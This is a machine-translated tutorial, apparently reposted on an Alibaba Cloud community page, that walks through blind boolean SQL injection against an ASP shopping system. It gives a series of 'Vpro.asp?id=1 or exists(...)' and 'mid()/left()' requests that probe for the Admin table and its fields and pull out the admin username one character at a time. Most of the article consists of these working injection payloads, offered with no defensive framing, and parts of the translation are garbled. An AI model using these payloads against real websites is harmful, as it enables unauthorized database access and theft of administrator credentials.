Home > Others

I haven't written it for a long time. Recently, I'm in a bad mood. I just sent an article to ease my mood ....

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >
I haven't written it for a long time
Recently, I am in a bad mood.
Send an article to ease your mood ....
Recently, the Security Detection on the space-time and space-time literature site is very interesting.
It is worth learning and researching.
I thought about network security for a long time.
Or 1 = 1 Script Injection Technology

We use the thunder Shopping System for or injection demonstration. We first use or 1 = 1 and or 1 = 2 to test whether there are injection points. Let's first look at the normal page. We now use or 1 = 1 to test whether the injection vulnerability exists. Another page is returned. Let's test or 1 = 2. The returned page is a normal page, indicating that an error occurs when the guess is correct and that the guess is normal when the guess is wrong. This is the true "false is true or false ", it's more classic than lake2's IP spoofing.
 
Let's construct the test statement:

Vpro. asp? Id = 1 or exists (select * from Admin)
The error page is returned, indicating that the admin table exists. Let's try another table!

Vpro. asp? Id = 1 or exists (select * From n0h4ck)
The table n0h4ck does not exist.
Let's continue and construct the statement.

Vpro. asp? Id = 1 or exists (Select Admin from Admin)
The OR 1 = 1 page is returned, indicating that the admin table has the admin field.

Vpro. asp? Id = 1 or exists (select padd from Admin)
The OR 1 = 2 page is returned, indicating that the padd field does not exist in the admin table.
Now we start to guess the data,

Vpro. asp? Id = 1 or (select mid (Admin, 1, 1) from Admin) = 'n'
The OR 1 = 2 page is returned, indicating that the first character of the first data in the admin field of the Admin table is not "N ".
Let's try again

Vpro. asp? Id = 1 or (select mid (Admin, 1, 1) from Admin) = 'A'
Return the page with or 1 = 1, indicating that the first character of the first data in the admin field of the Admin table is "A". What do we think of first data? Of course it is "admin.
Let's use the left function to determine,

Vpro. asp? Id = 1 or (select left (Admin, 5) from Admin) = 'admin'
The guess is correct. It is indeed Admin. Okay, I don't need to talk about it later.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
texas a i s i to go mood edits i 1 mood pictures videos best book to study for a certification a for dummies

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More